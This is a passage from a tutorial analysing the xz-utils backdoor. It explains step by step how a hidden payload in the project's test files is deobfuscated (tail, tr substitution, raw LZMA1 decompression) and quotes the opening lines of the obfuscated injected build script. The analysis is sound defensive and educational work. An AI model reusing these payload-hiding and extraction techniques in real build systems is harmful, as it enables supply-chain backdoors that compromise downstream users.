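# Verify the quantity of the extracted data: prints 33707
head -c 65536 /dev/urandom | extract_chunks | wc -c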

The next shell pipeline component:

tail_opts=(
    # Output the content starting from the 31233rd byte of the input data
    --bytes +31233
)
tail "${tail_opts[@]}"

filters out the bytes before the 31233rd byte(i.e. the first 31232 bytes of its input).

The next shell pipeline component:

tr \
    "\114-\321\322-\377\35-\47\14-\34\0-\13\50-\113" \
    "\0-\377"

translates the data using a byte-value substitution: the six octal byte ranges in the first set together cover all 256 possible byte values, and each is mapped one-to-one onto the corresponding position of the \0-\377 range. This is essentially a simple substitution cipher that deobfuscates the payload.
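A tiny demonstration: the letter L is the byte \114(octal), the first byte of the first input range, so it is translated to \0, the first byte of the output range:

# Prints "000": the byte \114("L") is translated to the byte \000
printf 'L' \
    | tr "\114-\321\322-\377\35-\47\14-\34\0-\13\50-\113" "\0-\377" \
    | od -An -to1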

The next shell pipeline component:

xz_opts=(
    # Decompress compressed data
    --decompress
    
    # Decompresses a _raw_ LZMA1 stream
    --format raw
    --lzma1
    
    # Output decompressed data to the standard output
    # device
    --stdout
)
xz "${xz_opts[@]}"

Decompresses the data by assuming it is a raw LZMA1 stream, which is a very specific decompression parameter combination.
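The following round-trip sketch shows why the parameter combination matters: a raw stream carries no header describing its filter chain, so the decompressor must be invoked with the exact same filter settings that were used during compression(xz prints warnings about raw streams to the standard error device, hence the redirections):

# Compress sample data into a headerless raw LZMA1 stream
echo 'hello' | xz --format raw --lzma1 2>/dev/null >hello.lzma1.raw

# Decompression only succeeds with the matching filter settings
xz --format raw --lzma1 --decompress --stdout hello.lzma1.raw 2>/dev/null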

By running the pipeline, but redirecting the output to a file instead of piping it to /bin/sh, we can retrieve the deobfuscation result:

(
    xz -dc $srcdir/tests/files/good-large_compressed.lzma \
    | (
        (head -c +1024 >/dev/null) \
            && head -c +2048 \
            && (head -c +1024 >/dev/null) \
            && head -c +2048 \
            && (head -c +1024 >/dev/null) \
            && head -c +2048 \
            && (head -c +1024 >/dev/null) \
            && head -c +2048 \
            && (head -c +1024 >/dev/null) \
            && head -c +2048 \
            && (head -c +1024 >/dev/null) \
            && head -c +2048 \
            && (head -c +1024 >/dev/null) \
            && head -c +2048 \
            && (head -c +1024 >/dev/null) \
            && head -c +2048 \
            && (head -c +1024 >/dev/null) \
            && head -c +2048 \
            && (head -c +1024 >/dev/null) \
            && head -c +2048 \
            && (head -c +1024 >/dev/null) \
            && head -c +2048 \
            && (head -c +1024 >/dev/null) \
            && head -c +2048 \
            && (head -c +1024 >/dev/null) \
            && head -c +2048 \
            && (head -c +1024 >/dev/null) \
            && head -c +2048 \
            && (head -c +1024 >/dev/null) \
            && head -c +2048 \
            && (head -c +1024 >/dev/null) \
            && head -c +2048 \
            && (head -c +1024 >/dev/null) \
            && head -c +939
    ) \
    | tail -c +31233 \
    | tr "\114-\321\322-\377\35-\47\14-\34\0-\13\50-\113" "\0-\377"
) \
    | xz -F raw --lzma1 -dc \
    > good-large_compressed.deobfuscated

Surprise, surprise! Another shell script!

P="-fPIC -DPIC -fno-lto -ffunction-sections -fdata-sections"
C="pic_flag=\" $P\""
O="^pic_flag=\" -fPIC -DPIC\"$"
R="is_arch_extension_supported"
x="__get_cpuid("
p="good-large_compressed.lzma"
U="bad-3-corrupt_lzma2.xz"
[ ! $(uname)="Linux" ] && exit 0
eval $zrKcVq
if test -f config.status; then
eval $zrKcSS

    ...stripped...

This time it's a heavily obfuscated shell script as well, discouraging researchers from digging deeper into the abyss.

As analysing the script requires a deep understanding of the following subjects, I have to give up and just look for answers from other people now:

  • AWK
  • GCC
  • GNU ld
  • glibc
  • libtool

I would suggest checking out the research!rsc: The xz attack shell script article by Russ Cox, which explains what the segments in this script (may) do.

Credits

The following people, among others, helped during the writing of this tutorial:

References

During the writing of this tutorial, the following third-party materials were referenced:


This work is released into the public domain; refer to the workspace homepage for more details.

This work was initially written by 林博仁(Buo-ren Lin); attribution will be appreciated.